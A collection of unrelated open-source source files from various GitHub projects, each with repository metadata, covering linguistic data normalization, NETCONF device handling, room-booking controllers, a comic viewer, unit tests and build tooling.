# as +DB even if they are for the same, single IGT
for item in items:
tags = get_tags(item)
if tags[0] in ('L', 'G', 'L-G') and 'DB' in tags[1:]:
# don't attempt
return items
indent = min_indent(items, tags=('L','G','L-G','L-G-T','G-T'))
new_items = []
for item in items:
tags = get_tags(item)
text = item.text
if (tags[0] == 'T' and 'CR' not in tags[1:]):
text = re.sub(
r'([{cq}])\s*(\s|/)\s*([{oq}])'
.format(oq=OPENQUOTES,cq=CLOSEQUOTES),
r'\1 \2 \3', text, re.I|re.U
)
matches = [m for m in basic_quoted_trans_re.finditer(text)
if m.group('t').strip()]
sub_items = []
if matches:
pos = 0
bare_T_seen = False
last_i = len(matches) - 1
for i, match in enumerate(matches):
start, end = match.start(), match.end()
t = match.group('t')
if i == last_i and re.search(r'\w|\d', text[end:], re.U):
t += text[match.end():]
pre = text[pos:match.start()]
# some instances have bad matches... try to avoid with
# a hard limit of 30 chars for the note or note is 2x
# size of t
prelen = len(pre.strip())
if prelen > 30 or prelen >= (2*len(t.strip())):
sub_items = []
new_items.append(item)
break
new_tags = list(tags)
if re.search(r'lit(?:eral(?:ly)?)?', pre):
if 'LT' not in new_tags: new_tags.append('LT')
elif (re.search(r'(or|also|ii+|\b[bcd]\.)[ :,]', pre)
or bare_T_seen):
if 'AL' not in new_tags: new_tags.append('AL')
else:
bare_T_seen = True
attrs = dict(item.attributes)
if match.group('judg'):
attrs['judgment'] = match.group('judg')
if re.search(r'\w|\d', pre, re.U):
attrs['note'] = pre.strip()
attrs['tag'] = '+'.join(new_tags)
sub_items.append(Item(
id=item.id + '_{}'.format(i+1),
attributes=attrs,
text=t
))
pos = end
new_items.extend(sub_items)
else:
new_items.append(item)
else:
new_items.append(item)
return new_items
# pre_trans_re = re.compile(
# '(?P<s>' # s comes before t
# r'\s*(?P<open>[(\[])?\s*'
# r'(?P<pre>(?: *(?:\w\'\w|[^{oq} (:,])*){{1,3}})(?P<delim>[:=.])?\s*?'
# ')' # end s group
# '(?P<t>'
# r'((?P<cm>(?:^| ),)|(?P<oq>[{oq}]))'
# r'(s\' \w|\'\w|," |[^{cq}{oq}])+'
# r'((?(oq)([{cq}]|[^{oq}]*|\s*$)|(?(cm)[{cq}`]|[^{oq}]*)))'
# r'|(?(delim)(?(open)[^)\]]+|[^(\[]+))' # unquoted translation?
# ')' # end t group
# .format(oq=OPENQUOTES, cq=CLOSEQUOTES),
# re.I|re.U
# )
# def separate_secondary_translations(items):
# # sometimes translation lines with secondary translations are marked
# # as +DB even if they are for the same, single IGT
# for item in items:
# tags = get_tags(item)
# if tags[0] in ('L', 'G', 'L-G') and 'DB' in tags[1:]:
# # don't attempt
# return items
# indent = min_indent(items, tags=('L','G','L-G','L-G-T','G-T'))
#
# new_items = []
# for item in items:
# tags = get_tags(item)
# text = item.text
# matches = [m for m in pre_trans_re.finditer(text)
# if m.group('pre').strip() or m.group('t').strip()]
# if (tags[0] == 'T' and 'CR' not in tags[1:]
# and (':' in text or basic_quoted_trans_re.search(text))
# and matches):
# # regrouping may be necessary for an over-eager regex
# parts = []
# for match in matches:
# pre = match.group('pre').strip()
# t = match.group('t').strip()
# if parts and pre and not t:
# parts[-1]['t'] = parts[-1]['t'] + match.group('s')
# else:
# parts.append({'pre': pre, 't': t})
# if len(parts) > 1:
# tags = [t for t in tags if t not in ('AL', 'LT', 'DB')]
# bare_T_seen = False
# for i, part in enumerate(parts):
# new_tags = list(tags)
# if re.search(r'lit(?:eral(?:ly)?)?', part['pre']):
# if 'LT' not in new_tags: new_tags.append('LT')
# elif (re.search(r'(or|also|ii+|\b[bcd]\.)[ :,]', part['pre'])
# or bare_T_seen):
# if 'AL' not in new_tags: new_tags.append('AL')
# else:
# bare_T_seen = True
# attrs = dict(item.attributes)
# if part['pre']:
# attrs['note'] = part['pre']
# attrs['tag'] = '+'.join(new_tags)
# new_items.append(Item(
# id=item.id + '_{}'.format(i),
# attributes=attrs,
# text=part['t']
# ))
# else:
# new_items.append(item)
# return new_items
def dewrap_lines(items):
# look for patterns like L G L G and join them to L G
# then look for T T and join them to T if they don't look like alternates
unwrapped = []
used = set()
sig = []
for item in items:
tags = get_tags(item)
if tags[0] in ('L', 'G', 'T'):
sig.append(item.attributes['tag'])
sig = ' '.join(sig)
if (any(x in sig for x in ('L G L G ', 'L G T L G T', 'G G ', 'L L '))
and not any(x in sig for x in ('L+', 'L-', 'G+', 'G-'))):
# likely patterns for wrapping without other noise
ls = [item for item in items if item.attributes.get('tag') == 'L']
gs = [item for item in items if item.attributes.get('tag') == 'G']
for l_, g_ in zip_longest(ls, gs):
if l_ is not None and g_ is not None:
maxlen = max([len(l_.text), len(g_.text)])
l_.text = l_.text.ljust(maxlen)
g_.text = g_.text.ljust(maxlen)
if ls:
merge_items(*ls)
unwrapped.append(ls[0])
if gs:
merge_items(*gs)
unwrapped.append(gs[0])
used.update(id(x) for x in ls + gs)
# add everything unused up to the first translation
for item in items:
if item.attributes.get('tag') in ('T', 'T+AC'):
break
elif id(item) not in used:
unwrapped.append(item)
used.add(id(item))
# now do translations
if (any(x in sig for x in ('L G T L G T', 'T T+AC', 'T T+LN', 'T T'))
and not any(x in sig for x in ('+EX', '+LT', '+AL', 'T+CR'))):
# translations that appear wrapped and not alternates
ts = [item for item in items
if item.attributes.get('tag') in ('T', 'T+AC', 'T+LN')]
if ts:
merge_items(*ts)
unwrapped.append(ts[0])
used.update(id(x) for x in ts)
# finally add anything unused
for item in items:
if id(item) not in used:
unwrapped.append(item)
used.add(id(item))
return unwrapped
def unquote_translations(items):
for item in items:
tags = get_tags(item)
if tags[0] == 'T':
item.text = re.sub(
r'^\s*[{}]?'.format(OPENQUOTES), '', item.text, re.U
)
item.text = re.sub(
r'[{}]\s*$'.format(CLOSEQUOTES), '', item.text, re.U
)
return items
## ============================================= ##
## For running as a script rather than a library ##
## ============================================= ##
def main(arglist=None):
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description="Normalize ODIN 'clean' tiers",
epilog='examples:\n'
' odinnormalize.py by-doc-id/10.xml\n'
' cat 10-clean.xml | odinnormalize.py > 10-norm.xml'
)
parser.add_argument('-v', '--verbose',
action='count', dest='verbosity', default=2,
help='increase the verbosity (can be repeated: -vvv)'
)
parser.add_argument('infiles',
nargs='*',
help='the ODIN Xigt (XML) files to normalize'
)
args = parser.parse_args(arglist)
logging.basicConfig(level=50-(args.verbosity*10))
run(args)
def run(args):
if args.infiles:
for fn in args.infiles:
logging.info('Normalizing {}'.format(fn))
xc = xigtxml.load(fn, mode='full')
normalize_corpus(xc)
xigtxml.dump(fn, xc)
else:
xc = xigtxml.load(sys.stdin, mode='full')
normalize_corpus(xc)
print(xigtxml.dumps(xc))
if __name__ == '__main__':
main()
| {
"content_hash": "5e57307d31e2d9c7c5b766e7a68c45c9",
"timestamp": "",
"source": "github",
"line_count": 708,
"max_line_length": 119,
"avg_line_length": 37.559322033898304,
"alnum_prop": 0.5082731648616126,
"repo_name": "xigt/odin-utils",
"id": "81bbae90d0d0962c318de47c71f993b6f8c7fda3",
"size": "26615",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "odinnormalize.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "48073"
},
{
"name": "Shell",
"bytes": "10118"
}
],
"symlink_target": ""
} |
"""
Handler for Huawei device specific information through YANG.
Note that for proper import, the classname has to be:
"<Devicename>DeviceHandler"
...where <Devicename> is something like "Default", "Huawei", etc.
All device-specific handlers derive from the DefaultDeviceHandler, which implements the
generic information needed for interaction with a Netconf server.
"""
from ncclient.xml_ import BASE_NS_1_0
from .default import DefaultDeviceHandler
class HuaweiyangDeviceHandler(DefaultDeviceHandler):
"""
Huawei handler for device specific information .
In the device_params dictionary, which is passed to __init__, you can specify
the parameter "ssh_subsystem_name". That allows you to configure the preferred
SSH subsystem name that should be tried on your Huawei switch. If connecting with
that name fails, or you didn't specify that name, the other known subsystem names
will be tried. However, if you specify it then this name will be tried first.
"""
_EXEMPT_ERRORS = []
def __init__(self, device_params):
super(HuaweiyangDeviceHandler, self).__init__(device_params)
def get_capabilities(self):
# Just need to replace a single value in the default capabilities
c = []
c.append('urn:ietf:params:netconf:base:1.0')
c.append('urn:ietf:params:netconf:base:1.1')
return c
def get_xml_base_namespace_dict(self):
return {None: BASE_NS_1_0}
def get_xml_extra_prefix_kwargs(self):
d = {}
d.update(self.get_xml_base_namespace_dict())
return {"nsmap": d}
| {
"content_hash": "1d1d8a316fc3c9df8b10a91e40301205",
"timestamp": "",
"source": "github",
"line_count": 48,
"max_line_length": 87,
"avg_line_length": 33.5625,
"alnum_prop": 0.6964618249534451,
"repo_name": "earies/ncclient",
"id": "00569b1d1867aa8c3d1b4d3c99d2b0674c864a62",
"size": "1611",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "ncclient/devices/huaweiyang.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "194806"
}
],
"symlink_target": ""
} |
from google.cloud import datacatalog_v1beta1
async def sample_list_tags():
# Create a client
client = datacatalog_v1beta1.DataCatalogAsyncClient()
# Initialize request argument(s)
request = datacatalog_v1beta1.ListTagsRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_tags(request=request)
# Handle the response
async for response in page_result:
print(response)
# [END datacatalog_v1beta1_generated_DataCatalog_ListTags_async]
| {
"content_hash": "f3c03f89f047c75c1a76eeb9f9c67a02",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 64,
"avg_line_length": 25.75,
"alnum_prop": 0.7126213592233009,
"repo_name": "googleapis/python-datacatalog",
"id": "b1e4a2729fb4385e6926ee2c9e440ffd50a176c5",
"size": "1902",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "samples/generated_samples/datacatalog_v1beta1_generated_data_catalog_list_tags_async.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2050"
},
{
"name": "Python",
"bytes": "3073442"
},
{
"name": "Shell",
"bytes": "30675"
}
],
"symlink_target": ""
} |
from __future__ import print_function, division, absolute_import
import logging
from tornado import gen
from .plugin import SchedulerPlugin
from ..core import connect, write, coerce_to_address
from ..worker import dumps_function
logger = logging.getLogger(__name__)
class EventStream(SchedulerPlugin):
""" Maintain a copy of worker events """
def __init__(self, scheduler=None):
self.buffer = []
if scheduler:
scheduler.add_plugin(self)
def transition(self, key, start, finish, *args, **kwargs):
if start == 'processing':
kwargs['key'] = key
if finish == 'memory' or finish == 'erred':
self.buffer.append(kwargs)
def swap_buffer(scheduler, es):
es.buffer, buffer = [], es.buffer
return buffer
def teardown(scheduler, es):
scheduler.remove_plugin(es)
@gen.coroutine
def eventstream(address, interval):
""" Open a TCP connection to scheduler, receive batched task messages
The messages coming back are lists of dicts. Each dict is of the following
form::
{'key': 'mykey', 'worker': 'host:port', 'status': status,
'compute_start': time(), 'compute_stop': time(),
'transfer_start': time(), 'transfer_stop': time(),
'disk_load_start': time(), 'disk_load_stop': time(),
'other': 'junk'}
Where ``status`` is either 'OK', or 'error'
Parameters
----------
address: address of scheduler
interval: time between batches, in seconds
Examples
--------
>>> stream = yield eventstream('127.0.0.1:8786', 0.100) # doctest: +SKIP
>>> print(yield read(stream)) # doctest: +SKIP
[{'key': 'x', 'status': 'OK', 'worker': '192.168.0.1:54684', ...},
{'key': 'y', 'status': 'error', 'worker': '192.168.0.1:54684', ...}]
"""
ip, port = coerce_to_address(address, out=tuple)
stream = yield connect(ip, port)
yield write(stream, {'op': 'feed',
'setup': dumps_function(EventStream),
'function': dumps_function(swap_buffer),
'interval': interval,
'teardown': dumps_function(teardown)})
raise gen.Return(stream)
| {
"content_hash": "bd2408bfc6749d75fa9499c5b0f110c2",
"timestamp": "",
"source": "github",
"line_count": 73,
"max_line_length": 79,
"avg_line_length": 30.465753424657535,
"alnum_prop": 0.5908273381294964,
"repo_name": "amosonn/distributed",
"id": "6b5677a22bdba1f9560e3c317eca5afa5c0ba44a",
"size": "2224",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "distributed/diagnostics/eventstream.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "3228"
},
{
"name": "Python",
"bytes": "737968"
},
{
"name": "Shell",
"bytes": "901"
}
],
"symlink_target": ""
} |
from flask import jsonify, request, session
from webargs import fields
from werkzeug.exceptions import Forbidden
from indico.core.db import db
from indico.modules.rb.controllers import RHRoomBookingBase
from indico.modules.rb.models.blocked_rooms import BlockedRoom
from indico.modules.rb.models.blockings import Blocking
from indico.modules.rb.operations.blockings import create_blocking, get_room_blockings, update_blocking
from indico.modules.rb.schemas import blockings_schema
from indico.util.marshmallow import PrincipalList
from indico.web.args import use_args, use_kwargs
class RHCreateRoomBlocking(RHRoomBookingBase):
@use_args({
'room_ids': fields.List(fields.Int(), missing=[]),
'start_date': fields.Date(required=True),
'end_date': fields.Date(required=True),
'reason': fields.Str(required=True),
'allowed': PrincipalList(allow_groups=True, required=True),
})
def _process(self, args):
blocking = create_blocking(created_by=session.user, **args)
return jsonify(blockings_schema.dump(blocking, many=False))
class RHUpdateRoomBlocking(RHRoomBookingBase):
def _check_access(self):
RHRoomBookingBase._check_access(self)
if not self.blocking.can_edit(session.user):
raise Forbidden
def _process_args(self):
self.blocking = Blocking.get_or_404(request.view_args['blocking_id'])
@use_args({
'room_ids': fields.List(fields.Int(), required=True),
'reason': fields.Str(required=True),
'allowed': PrincipalList(allow_groups=True, required=True),
})
def _process(self, args):
update_blocking(self.blocking, **args)
return jsonify(blockings_schema.dump(self.blocking, many=False))
class RHRoomBlockings(RHRoomBookingBase):
@use_kwargs({
'timeframe': fields.Str(missing=None),
'my_rooms': fields.Bool(missing=False),
'mine': fields.Bool(missing=False)
}, location='query')
def _process(self, timeframe, my_rooms, mine):
filters = {'timeframe': timeframe, 'created_by': session.user if mine else None,
'in_rooms_owned_by': session.user if my_rooms else None}
blockings = get_room_blockings(**filters)
return jsonify(blockings_schema.dump(blockings))
class RHRoomBlockingBase(RHRoomBookingBase):
def _process_args(self):
self.blocking = Blocking.get_or_404(request.view_args['blocking_id'])
class RHRoomBlocking(RHRoomBlockingBase):
def _process(self):
return jsonify(blockings_schema.dump(self.blocking, many=False))
class RHBlockedRoomAction(RHRoomBlockingBase):
def _process_args(self):
RHRoomBlockingBase._process_args(self)
self.action = request.view_args['action']
self.blocked_room = (BlockedRoom.query
.with_parent(self.blocking)
.filter_by(room_id=request.view_args['room_id'])
.first_or_404())
def _check_access(self):
RHRoomBlockingBase._check_access(self)
if not self.blocked_room.room.can_manage(session.user):
raise Forbidden
def _process(self):
if self.action == 'accept':
self.blocked_room.approve()
elif self.action == 'reject':
self.reject()
return jsonify(blocking=blockings_schema.dump(self.blocking, many=False))
@use_kwargs({
'reason': fields.Str(required=True)
})
def reject(self, reason):
self.blocked_room.reject(session.user, reason)
class RHDeleteBlocking(RHRoomBlockingBase):
def _check_access(self):
RHRoomBlockingBase._check_access(self)
if not self.blocking.can_delete(session.user):
raise Forbidden
def _process(self):
db.session.delete(self.blocking)
return jsonify(blocking_id=self.blocking.id)
| {
"content_hash": "afa4f56471c869d8b93680631752b467",
"timestamp": "",
"source": "github",
"line_count": 106,
"max_line_length": 103,
"avg_line_length": 36.716981132075475,
"alnum_prop": 0.6700924974306269,
"repo_name": "ThiefMaster/indico",
"id": "b26bd5002a7f2d383cdf949d7b936a74edf50490",
"size": "4106",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "indico/modules/rb/controllers/backend/blockings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "34704"
},
{
"name": "HTML",
"bytes": "1411006"
},
{
"name": "JavaScript",
"bytes": "2083786"
},
{
"name": "Mako",
"bytes": "1527"
},
{
"name": "Python",
"bytes": "5133951"
},
{
"name": "SCSS",
"bytes": "476568"
},
{
"name": "Shell",
"bytes": "3877"
},
{
"name": "TeX",
"bytes": "23327"
},
{
"name": "XSLT",
"bytes": "1504"
}
],
"symlink_target": ""
} |
"""Pylons environment configuration"""
import os
from mako.lookup import TemplateLookup
from genshi.template import TemplateLoader
from jinja2 import ChoiceLoader, Environment, FileSystemLoader
from pylons.configuration import PylonsConfig
from pylons.error import handle_mako_error
from sqlalchemy import engine_from_config
import projectname.lib.app_globals as app_globals
import projectname.lib.helpers
from projectname.config.routing import make_map
from projectname.model import init_model
def load_environment(global_conf, app_conf):
"""Configure the Pylons environment via the ``pylons.config``
object
"""
config = PylonsConfig()
# Pylons paths
root = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
paths = dict(root=root,
controllers=os.path.join(root, 'controllers'),
static_files=os.path.join(root, 'public'),
templates=[os.path.join(root, 'templates')])
# Initialize config with the basic options
config.init_app(global_conf, app_conf, package='projectname', paths=paths)
config['routes.map'] = make_map(config)
config['pylons.app_globals'] = app_globals.Globals(config)
config['pylons.h'] = projectname.lib.helpers
# Setup cache object as early as possible
import pylons
pylons.cache._push_object(config['pylons.app_globals'].cache)
# Create the Mako TemplateLookup, with the default auto-escaping
config['pylons.app_globals'].mako_lookup = TemplateLookup(
directories=paths['templates'],
error_handler=handle_mako_error,
module_directory=os.path.join(app_conf['cache_dir'], 'templates'),
input_encoding='utf-8', default_filters=['escape'],
imports=['from webhelpers.html import escape'])
# Create the Genshi TemplateLoader
config['pylons.app_globals'].genshi_loader = TemplateLoader(
paths['templates'], auto_reload=True)
# Create the Jinja2 Environment
config['pylons.app_globals'].jinja2_env = Environment(loader=ChoiceLoader(
[FileSystemLoader(path) for path in paths['templates']]))
# CONFIGURATION OPTIONS HERE (note: all config options will override
# any Pylons config options)
engine = engine_from_config(config, 'sqlalchemy.')
init_model(engine)
return config
| {
"content_hash": "6f70455b9e65b36d33bb1813eea8cfdd",
"timestamp": "",
"source": "github",
"line_count": 63,
"max_line_length": 78,
"avg_line_length": 37.15873015873016,
"alnum_prop": 0.7035454933788979,
"repo_name": "Pylons/pylons",
"id": "9a6dccac79d85ce31ee58d5abe1ada8cdfbe8863",
"size": "2341",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tests/test_webapps/filestotest/environment_def_sqlamodel.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "29990"
},
{
"name": "HTML",
"bytes": "13435"
},
{
"name": "JavaScript",
"bytes": "4066"
},
{
"name": "Makefile",
"bytes": "2195"
},
{
"name": "Python",
"bytes": "400516"
}
],
"symlink_target": ""
} |
import tornado.web as web
import tornado.template as template
import tornado.ioloop as ioloop
import os,sys,mimetypes
import rarfile,zipfile
supported_archive = [".zip", ".rar"]
supported_image = [".jpe", ".jpg", ".jpeg", ".gif", ".png"]
work_dir = os.getcwd()
list_template = template.Template(
"""<html>
<head>
<title>PyComicCast</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head>
<body>
<ul>
{% for i in names %}
<li> <a href="/{{ i[0] }}/0">{{ escape(i[1]) }}</a> </li>
{% end %}
</ul>
</body>
</html>"""
)
image_template = template.Template(
"""<html>
<head>
<title>PyComicCast</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<style type="text/css">
img.content {max-width:100%;}
div.content {text-align:center;}
div.navi {text-align:center;}
</style>
</head>
<body>
<div class="content">
<a href="/{{archive}}/{{image + 1}}"><img class="content" src="/{{archive}}/{{image}}/image"/></a>
</div>
<br />
<br />
<div class="navi">
<a href="/{{archive}}/{{image - 1}}">Previous</a>
<a href="/">Return</a>
<a href="/{{archive}}/{{image + 1}}">Next</a>
</div>
</body>
</html>"""
)
file_objs = {}
def get_file_list():
return [i for i in os.listdir(work_dir) if os.path.splitext(i)[1].lower() in supported_archive]
def get_file_obj(index):
name = get_file_list()[index]
if not name in file_objs:
if name.endswith(".rar"):
obj = rarfile.RarFile(os.path.join(work_dir, name))
elif name.endswith(".zip"):
obj = zipfile.ZipFile(os.path.join(work_dir, name))
else:
raise Exception, "Not supported archive file!"
img_list = [i for i in obj.namelist() if os.path.splitext(i)[1].lower() in supported_image]
img_list.sort()
file_objs[name] = (obj, img_list)
return file_objs[name]
class RootHandler(web.RequestHandler):
def get(self):
self.write(list_template.generate(names=enumerate(get_file_list())))
class ImagePageHandler(web.RequestHandler):
def get(self, archive, image):
image = int(image)
archive = int(archive)
max_index = len(get_file_obj(archive)[1])
if image < 0 or image >= max_index:
self.redirect("/")
return
self.write(image_template.generate(archive=archive,image=image))
class ImageHandler(web.RequestHandler):
def get(self, archive, image):
image = int(image)
archive = int(archive)
obj = get_file_obj(archive)
mimetype = mimetypes.guess_type(obj[1][image])
img = obj[0].open(obj[1][image])
self.set_header("Content-Type", mimetype[0])
while True:
data = img.read(2048)
if not data:
break
self.write(data)
application = web.Application([
(r"/", RootHandler),
(r"/(\d+)/(-?\d+)", ImagePageHandler),
(r"/(\d+)/(-?\d+)/image", ImageHandler)
])
if __name__=="__main__":
if len(sys.argv) >= 2:
work_dir = sys.argv[1]
application.listen(8888)
try:
ioloop.IOLoop.instance().start()
except KeyboardInterrupt:
print "Exiting..."
| {
"content_hash": "0acc15c4b4ecd04312db8e4adfdec374",
"timestamp": "",
"source": "github",
"line_count": 119,
"max_line_length": 106,
"avg_line_length": 28.3781512605042,
"alnum_prop": 0.558187740598164,
"repo_name": "chaserhkj/PyComicCast",
"id": "b4714ca463f46e6e705c038ef2bd9ae0decb2152",
"size": "3515",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ComicCast.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "3515"
}
],
"symlink_target": ""
} |
from unittest import mock
import octavia # noqa H306
from octavia.common import constants
from octavia.controller.worker.v2.tasks import notification_tasks
import octavia.tests.unit.base as base
class MockNOTIFIER(mock.MagicMock):
info = mock.MagicMock()
@mock.patch('octavia.common.rpc.NOTIFIER',
new_callable=MockNOTIFIER)
@mock.patch('octavia.common.context.Context', new_callable=mock.MagicMock)
@mock.patch('octavia.api.v2.types.load_balancer.LoadBalancerFullResponse.'
'from_data_model',
new_callable=mock.MagicMock)
class TestNotificationTasks(base.TestCase):
def test_update_notification_execute(self, *args):
noti = notification_tasks.SendUpdateNotification()
id = 1
lb = {constants.PROJECT_ID: id,
constants.LOADBALANCER_ID: id}
noti.execute(lb)
octavia.common.context.Context.assert_called_with(project_id=id)
call_args, call_kwargs = octavia.common.rpc.NOTIFIER.info.call_args
self.assertEqual('octavia.loadbalancer.update.end', call_args[1])
def test_create_notification(self, *args):
noti = notification_tasks.SendCreateNotification()
id = 2
lb = {constants.PROJECT_ID: id,
constants.LOADBALANCER_ID: id}
noti.execute(lb)
octavia.common.context.Context.assert_called_with(project_id=id)
call_args, call_kwargs = octavia.common.rpc.NOTIFIER.info.call_args
self.assertEqual('octavia.loadbalancer.create.end', call_args[1])
def test_delete_notification(self, *args):
noti = notification_tasks.SendDeleteNotification()
id = 3
lb = {constants.PROJECT_ID: id,
constants.LOADBALANCER_ID: id}
noti.execute(lb)
octavia.common.context.Context.assert_called_with(project_id=id)
call_args, call_kwargs = octavia.common.rpc.NOTIFIER.info.call_args
self.assertEqual('octavia.loadbalancer.delete.end', call_args[1])
| {
"content_hash": "9baabe34fc3626f2b738b4fd3b876c19",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 75,
"avg_line_length": 42.191489361702125,
"alnum_prop": 0.6898638426626323,
"repo_name": "openstack/octavia",
"id": "e336ced359f9a84f3a8d1deab2baf78463eb26eb",
"size": "2526",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "octavia/tests/unit/controller/worker/v2/tasks/test_notification_tasks.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jinja",
"bytes": "60600"
},
{
"name": "Mako",
"bytes": "922"
},
{
"name": "Python",
"bytes": "6651664"
},
{
"name": "Ruby",
"bytes": "531"
},
{
"name": "Shell",
"bytes": "117966"
}
],
"symlink_target": ""
} |
from JumpScale import j
import JumpScale.grid.zdaemon
j.application.start("zdaemon")
j.logger.consoleloglevel = 2
j.core.zdaemon.initSSL4Server("myorg", "servertest")
j.application.stop()
| {
"content_hash": "1fbcd6c3446c069032e691488fb0fe9d",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 52,
"avg_line_length": 17.545454545454547,
"alnum_prop": 0.7772020725388601,
"repo_name": "Jumpscale/jumpscale6_core",
"id": "d3fa945a60b45870d42e9907895414a3db55698e",
"size": "194",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "examples/zdaemon/zdaemon_ssl_init.py",
"mode": "33261",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "3681"
},
{
"name": "HTML",
"bytes": "11738"
},
{
"name": "JavaScript",
"bytes": "70132"
},
{
"name": "Lua",
"bytes": "2162"
},
{
"name": "Python",
"bytes": "5848017"
},
{
"name": "Shell",
"bytes": "7692"
}
],
"symlink_target": ""
} |
from setuptools import setup
VERSION = '0.2.1'
install_reqs = [
'elasticsearch-dsl',
'requests',
'pandas'
]
setup(
name='sharepa',
packages=['sharepa'],
version=VERSION,
description='A library for browsing and analyzing SHARE data',
author='Fabian von Feilitzsch',
author_email='[email protected]',
url='https://github.com/fabianvf/sharepa',
download_url='https://github.com/fabianvf/sharepa/tarball/{}'.format(VERSION),
install_requires=install_reqs
)
| {
"content_hash": "7bd520bdcbbaa241fe05a0a3879b54d1",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 82,
"avg_line_length": 24.95,
"alnum_prop": 0.6753507014028056,
"repo_name": "erinspace/sharepa",
"id": "cd13743879c12cb8c6b51a22d299f8f080268084",
"size": "499",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "5997"
}
],
"symlink_target": ""
} |
import sys
import os, os.path
import shutil
import ConfigParser
import subprocess
import re
from contextlib import contextmanager
def _check_ndk_root_env():
''' Checking the environment NDK_ROOT, which will be used for building
'''
try:
NDK_ROOT = os.environ['NDK_ROOT']
except Exception:
print "NDK_ROOT not defined. Please define NDK_ROOT in your environment."
sys.exit(1)
return NDK_ROOT
def _check_python_bin_env():
''' Checking the environment PYTHON_BIN, which will be used for building
'''
try:
PYTHON_BIN = os.environ['PYTHON_BIN']
except Exception:
print "PYTHON_BIN not defined, use current python."
PYTHON_BIN = sys.executable
return PYTHON_BIN
class CmdError(Exception):
pass
@contextmanager
def _pushd(newDir):
previousDir = os.getcwd()
os.chdir(newDir)
yield
os.chdir(previousDir)
def _run_cmd(command):
ret = subprocess.call(command, shell=True)
if ret != 0:
message = "Error running command"
raise CmdError(message)
def main():
cur_platform= '??'
llvm_path = '??'
ndk_root = _check_ndk_root_env()
# del the " in the path
ndk_root = re.sub(r"\"", "", ndk_root)
python_bin = _check_python_bin_env()
platform = sys.platform
if platform == 'win32':
cur_platform = 'windows'
elif platform == 'darwin':
cur_platform = platform
elif 'linux' in platform:
cur_platform = 'linux'
else:
print 'Your platform is not supported!'
sys.exit(1)
if platform == 'win32':
x86_llvm_path = os.path.abspath(os.path.join(ndk_root, 'toolchains/llvm-3.3/prebuilt', '%s' % cur_platform))
if not os.path.exists(x86_llvm_path):
x86_llvm_path = os.path.abspath(os.path.join(ndk_root, 'toolchains/llvm-3.4/prebuilt', '%s' % cur_platform))
else:
x86_llvm_path = os.path.abspath(os.path.join(ndk_root, 'toolchains/llvm-3.3/prebuilt', '%s-%s' % (cur_platform, 'x86')))
if not os.path.exists(x86_llvm_path):
x86_llvm_path = os.path.abspath(os.path.join(ndk_root, 'toolchains/llvm-3.4/prebuilt', '%s-%s' % (cur_platform, 'x86')))
x64_llvm_path = os.path.abspath(os.path.join(ndk_root, 'toolchains/llvm-3.3/prebuilt', '%s-%s' % (cur_platform, 'x86_64')))
if not os.path.exists(x64_llvm_path):
x64_llvm_path = os.path.abspath(os.path.join(ndk_root, 'toolchains/llvm-3.4/prebuilt', '%s-%s' % (cur_platform, 'x86_64')))
if os.path.isdir(x86_llvm_path):
llvm_path = x86_llvm_path
elif os.path.isdir(x64_llvm_path):
llvm_path = x64_llvm_path
else:
print 'llvm toolchain not found!'
print 'path: %s or path: %s are not valid! ' % (x86_llvm_path, x64_llvm_path)
sys.exit(1)
project_root = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..'))
cocos_root = os.path.abspath(os.path.join(project_root, '../../../cocos2d-x'))
cxx_generator_root = os.path.abspath(os.path.join(project_root, '../../../cocos2d-x/tools/bindings-generator'))
# save config to file
config = ConfigParser.ConfigParser()
config.set('DEFAULT', 'androidndkdir', ndk_root)
config.set('DEFAULT', 'clangllvmdir', llvm_path)
config.set('DEFAULT', 'cocosdir', cocos_root)
config.set('DEFAULT', 'cxxgeneratordir', cxx_generator_root)
config.set('DEFAULT', 'extra_flags', '')
# To fix parse error on windows, we must difine __WCHAR_MAX__ and undefine __MINGW32__ .
if platform == 'win32':
config.set('DEFAULT', 'extra_flags', '-D__WCHAR_MAX__=0x7fffffff -U__MINGW32__')
conf_ini_file = os.path.abspath(os.path.join(os.path.dirname(__file__), 'userconf.ini'))
print 'generating userconf.ini...'
with open(conf_ini_file, 'w') as configfile:
config.write(configfile)
# set proper environment variables
if 'linux' in platform or platform == 'darwin':
os.putenv('LD_LIBRARY_PATH', '%s/libclang' % cxx_generator_root)
if platform == 'win32':
path_env = os.environ['PATH']
os.putenv('PATH', r'%s;%s\libclang;%s\tools\win32;' % (path_env, cxx_generator_root, cxx_generator_root))
try:
tolua_root = '%s/Tools/tolua' % project_root
output_dir = '%s/Scripting/lua-bindings/auto' % project_root
cmd_args = {
